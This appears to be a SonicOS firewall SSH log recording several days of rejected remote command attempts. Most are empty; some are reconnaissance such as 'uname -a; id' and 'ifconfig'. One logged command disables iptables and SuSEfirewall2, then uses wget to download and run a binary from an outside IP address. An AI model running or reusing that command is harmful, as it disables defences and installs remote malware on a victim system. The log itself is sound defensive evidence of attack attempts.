02/11 13:32:52.368: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:33:05.112: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:33:18.176: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:33:31.592: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:33:44.608: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:33:58.384: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:34:09.384: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:34:19.304: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:34:32.064: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:34:45.080: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:34:58.416: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:35:10.304: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:35:19.064: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:35:28.720: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:35:36.624: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:35:45.096: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:35:52.736: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:36:00.576: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:36:08.768: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:36:16.624: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:36:24.640: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:36:32.576: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:36:40.592: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:36:49.384: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:36:59.384: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:37:07.432: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:37:15.640: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:37:23.480: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:37:31.752: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:37:39.880: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:37:47.576: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:37:55.544: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:38:03.736: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:38:11.688: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:38:19.704: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:38:27.928: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:38:35.864: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:38:44.144: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:38:52.240: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:39:00.240: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:39:08.480: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:39:16.400: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:39:24.560: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:39:32.720: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:39:41.080: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:39:49.144: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:39:57.400: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:40:05.400: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:40:13.320: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:40:21.560: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:40:29.528: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:40:37.800: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:40:46.000: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:40:54.160: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:41:02.816: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:41:10.320: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:41:18.560: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:41:26.320: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:41:34.560: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:41:42.560: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:41:50.720: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:41:58.496: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:42:06.496: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:42:14.560: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:42:22.336: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:42:30.496: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:42:38.336: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:42:46.352: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:42:54.416: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:43:02.512: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:43:10.560: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:43:18.432: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:43:26.432: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:43:34.384: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:43:42.272: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:43:50.240: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:43:58.352: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:44:06.240: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:44:14.272: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:44:22.352: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:44:30.192: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:44:38.432: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:44:46.352: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:44:54.400: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:45:02.400: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:45:10.352: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:45:18.352: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:45:26.512: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:45:34.672: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:45:42.912: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:45:51.032: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:45:59.032: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:46:07.272: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:46:15.352: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:46:23.672: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:46:31.848: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:46:40.480: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:46:48.464: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:46:56.656: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:47:05.016: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:47:13.176: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:47:21.704: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:47:29.704: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:47:38.096: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:47:46.256: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:47:54.256: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:48:02.240: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:48:10.576: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:48:18.816: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:48:26.912: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:48:35.192: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:48:43.432: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:48:51.848: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:49:00.064: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:49:08.160: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:49:16.416: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:49:24.384: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:49:32.416: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:49:40.320: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:49:48.416: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:49:56.480: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:50:00.192: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/11 13:50:05.000: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:50:13.064: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:50:21.080: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:50:29.256: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:50:37.000: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:50:45.256: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:50:53.176: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:51:01.176: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:51:09.224: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:51:17.320: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 13:51:25.160: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/11 15:29:13.880: fatal - Read from socket failed: errno = 0x36, connection_in 50
02/11 15:36:55.384: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/11 16:20:08.752: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/11 16:53:49.944: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/11 17:23:56.720: fatal - Read from socket failed: errno = 0x36, connection_in 50
02/11 19:35:14.704: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/11 19:59:05.464: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/11 20:58:37.176: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/11 21:09:41.576: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/11 22:15:53.672: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/11 22:16:22.016: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/11 22:42:41.752: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/11 22:56:32.160: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/12 00:40:52.416: fatal - do_exec_no_pty not supported in SonicOS command 'uname'
02/12 00:47:15.896: fatal - do_exec_no_pty not supported in SonicOS command 'ps; uname -a; id; uname -a; uname -a; id ; uname -a'
02/12 01:32:22.048: fatal - Read from socket failed: errno = 0x36, connection_in 50
02/12 02:53:56.240: fatal - Read from socket failed: errno = 0x3a, connection_in 53
02/12 02:54:06.432: fatal - Read from socket failed: errno = 0x3a, connection_in 50
02/12 02:55:05.128: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/12 02:55:17.624: fatal - Read from socket failed: errno = 0x3a, connection_in 51
02/12 02:56:12.608: fatal - Read from socket failed: errno = 0x3a, connection_in 50
02/12 02:56:22.512: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/12 02:57:17.688: fatal - Read from socket failed: errno = 0x3a, connection_in 53
02/12 02:57:26.240: fatal - Read from socket failed: errno = 0x3a, connection_in 50
02/12 02:58:21.016: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/12 02:58:29.400: fatal - Read from socket failed: errno = 0x3a, connection_in 51
02/12 02:59:31.272: fatal - Read from socket failed: errno = 0x3a, connection_in 53
02/12 02:59:57.416: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/12 03:00:32.768: fatal - Read from socket failed: errno = 0x3a, connection_in 52
02/12 03:00:59.192: fatal - Read from socket failed: errno = 0x3a, connection_in 50
02/12 03:01:34.448: fatal - Read from socket failed: errno = 0x3a, connection_in 52
02/12 03:02:00.816: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/12 03:02:36.304: fatal - Read from socket failed: errno = 0x3a, connection_in 52
02/12 03:03:02.640: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/12 03:03:07.848: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/12 03:03:07.848: fatal - Read from socket failed: errno = 0x3a, connection_in 52
02/12 06:23:37.176: fatal - do_exec_no_pty not supported in SonicOS command '/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.56.5:801/jweq;chmod 777 jweq;./jweq;'
02/12 08:12:21.368: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/12 10:39:25.368: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/12 11:28:57.752: fatal - Read from socket failed: errno = 0x36, connection_in 50
02/12 12:39:47.544: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/12 12:39:48.704: fatal - Read from socket failed: errno = 0x3a, connection_in 46
02/12 17:55:24.816: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/12 19:14:02.496: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/12 19:23:03.240: fatal - Read from socket failed: errno = 0x36, connection_in 46
02/12 19:27:32.576: fatal - Read from socket failed: errno = 0x36, connection_in 52
02/12 20:14:32.240: fatal - Read from socket failed: errno = 0x36, connection_in 46
02/12 20:35:46.576: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/12 22:22:39.896: fatal - Read from socket failed: errno = 0x36, connection_in 46
02/12 23:07:13.400: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/12 23:55:13.016: fatal - Read from socket failed: errno = 0x36, connection_in 46
02/13 01:10:17.400: fatal - Read from socket failed: errno = 0x36, connection_in 46
02/13 07:05:55.416: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/13 07:59:37.144: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/13 08:55:53.048: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/13 11:24:22.768: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/13 23:55:49.304: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/14 00:01:48.800: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/14 01:07:07.064: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/14 01:10:05.864: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/14 02:10:18.112: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/14 02:15:30.448: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/14 03:12:57.320: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/14 03:20:35.000: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/14 04:21:26.480: fatal - Read from socket failed: errno = 0x36, connection_in 46
02/14 05:49:31.368: fatal - Read from socket failed: errno = 0x36, connection_in 46
02/14 12:09:02.528: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/14 12:38:56.752: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/14 12:39:08.192: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/14 12:39:18.272: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/14 14:17:34.784: fatal - Read from socket failed: errno = 0x3a, connection_in 51
02/14 18:56:09.512: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/14 19:53:45.528: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/14 20:51:19.000: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/15 00:27:50.048: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
02/15 05:47:23.208: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:47:28.512: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:47:36.208: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:47:43.864: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:47:50.832: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:47:58.064: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:48:04.352: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:48:11.592: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:48:17.768: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:48:23.688: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:48:30.432: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:48:36.592: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:48:42.592: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:48:48.416: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:48:53.880: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:48:59.384: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:49:03.896: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:49:08.000: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:49:13.448: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:49:19.128: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:49:24.592: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:49:29.944: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:49:35.384: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:49:41.080: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:49:46.544: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:49:51.064: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:49:54.864: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:49:58.576: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:50:02.464: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:50:06.448: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:50:10.400: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:50:15.064: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:50:20.768: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:50:26.256: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:50:31.736: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:50:37.096: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:50:42.576: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:50:48.096: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:50:53.432: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:50:58.864: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:51:04.576: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:51:09.848: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:51:14.576: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:51:19.400: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:51:25.080: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:51:30.576: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:51:36.144: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:51:41.032: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:51:45.912: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:51:51.528: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:51:57.224: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:52:03.096: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:52:08.576: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:52:13.880: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:52:19.544: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:52:25.144: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:52:30.544: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:52:34.864: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:52:39.896: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:52:45.096: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:52:50.720: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:52:56.448: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:53:02.288: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:53:07.576: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:53:13.096: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:53:18.656: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:53:23.480: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:53:28.624: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:53:34.496: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:53:39.592: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:53:44.112: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:53:48.112: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:53:52.112: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:53:56.896: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:54:03.032: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:54:08.496: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:54:14.336: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:54:19.640: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:54:25.176: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:54:30.624: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:54:36.480: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:54:41.944: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:54:47.464: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:54:52.800: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:54:57.080: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:55:02.320: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:55:07.944: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:55:13.640: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:55:19.144: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:55:24.800: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:55:30.512: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:55:35.640: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:55:41.480: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:55:47.000: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:55:52.480: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:55:57.912: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:56:03.480: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:56:09.000: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:56:14.784: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:56:20.448: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:56:26.160: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:56:31.608: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:56:37.128: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:56:42.736: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:56:47.112: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:56:50.784: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:56:54.576: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:56:58.640: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:57:02.528: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:57:06.656: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:57:12.208: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:57:17.416: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:57:21.944: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:57:27.176: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:57:32.624: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:57:38.480: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:57:44.176: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:57:49.496: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:57:54.912: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:58:00.448: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:58:06.336: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:58:11.832: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:58:17.128: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:58:22.944: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:58:28.304: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:58:33.944: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:58:39.448: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:58:45.496: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:58:51.000: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:58:56.496: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:59:02.176: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:59:07.192: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:59:13.000: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:59:18.288: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:59:24.048: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:59:29.496: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:59:35.160: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:59:40.640: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:59:46.144: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:59:51.800: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 05:59:58.304: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
02/15 09:38:25.576: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/15 09:38:43.912: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/15 09:44:21.912: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/15 09:48:13.944: fatal - Read from socket failed: errno = 0x36, connection_in 46
02/15 09:50:18.512: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
02/15 11:41:57.128: fatal - Read from socket failed: errno = 0x36, connection_in 46
